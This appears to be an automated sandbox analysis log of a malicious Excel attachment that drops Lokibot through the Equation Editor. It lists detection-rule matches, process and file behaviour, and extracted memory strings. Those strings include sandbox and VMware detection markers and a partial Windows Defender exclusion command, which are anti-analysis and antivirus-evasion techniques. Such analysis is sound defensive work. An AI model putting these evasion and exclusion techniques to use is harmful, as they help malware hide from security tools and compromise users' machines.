Source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: regasm[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: regasm[1].exe.2.dr, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.d00000.3.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.d00000.1.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.d00000.0.unpack, MediaManager/DebuggableAttribute.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/20@0/2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 5_2_0040650A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 5_2_0040434D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Shipping-Documents.xlsx Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRFAD2.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: Shipping-Documents.xlsx Virustotal: Detection: 40%
Source: Shipping-Documents.xlsx ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Shipping-Documents.xlsx Static file information: File size 1359872 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: StringBuilderCache.pdb source: vbc.exe, vbc.exe.2.dr
Source: Shipping-Documents.xlsx Initial sample: OLE indicators vbamacros = False
Source: Shipping-Documents.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected aPLib compressed binary
Source: Yara match File source: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2170925331.0000000003369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3052, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.355d638.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.355d638.4.raw.unpack, type: UNPACKEDPE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03CE4 push es; ret 4_2_00D03CE7
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03BE1 push es; retn 0000h 4_2_00D03BEF
Source: C:\Users\Public\vbc.exe Code function: 4_2_0061885F push esp; retf 0017h 4_2_00618860
Source: C:\Users\Public\vbc.exe Code function: 4_2_00612433 pushad ; retf 4_2_00612435
Source: C:\Users\Public\vbc.exe Code function: 4_2_006120C2 push ss; iretd 4_2_006120C5
Source: C:\Users\Public\vbc.exe Code function: 4_2_006120CC push ss; iretd 4_2_006120CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_0061318B push ebp; retf 4_2_0061318D
Source: C:\Users\Public\vbc.exe Code function: 4_2_006162FD push es; retf 4_2_006162FE
Source: C:\Users\Public\vbc.exe Code function: 4_2_006147A5 push eax; retf 0017h 4_2_006147B1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00D03CE4 push es; ret 5_2_00D03CE7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00D03BE1 push es; retn 0000h 5_2_00D03BEF
Source: initial sample Static PE information: section name: .text entropy: 7.61248422498

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: Shipping-Documents.xlsx Stream path 'EncryptedPackage' entropy: 7.99980515236 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2856, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2684 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2940 Thread sleep time: -104691s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2844 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2992 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 104691 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2170739469.0000000002381000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
